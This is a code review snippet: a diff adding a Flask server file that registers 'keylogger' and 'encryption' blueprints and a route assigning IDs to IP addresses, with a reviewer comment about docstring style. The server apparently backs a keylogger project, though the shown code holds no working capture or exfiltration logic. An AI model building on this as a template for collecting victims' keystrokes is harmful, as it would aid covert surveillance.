src/server/app.py

```diff
@@ -0,0 +1,51 @@
+from flask import Flask, request, Blueprint, Response
+import sys
+from keylogger.keylog import keylog
+from encryption.encrypt import encrypt
+import json
+import string
+import random
+import os
+app: Flask = Flask(__name__)
+app.register_blueprint(keylog)
+app.register_blueprint(encrypt)
+
+
+@app.route('/id_request')
+def get_id() -> dict:
+    """
+    A route to fetch the id of a given ip address
+
+    Return:
+    a dictionary with a key of id, and the ip's corresonding id number
+    """
```

Comment:
We should probably be consistent in our styling of docs, either the Google or Numpy docs. Do we want to flip a coin?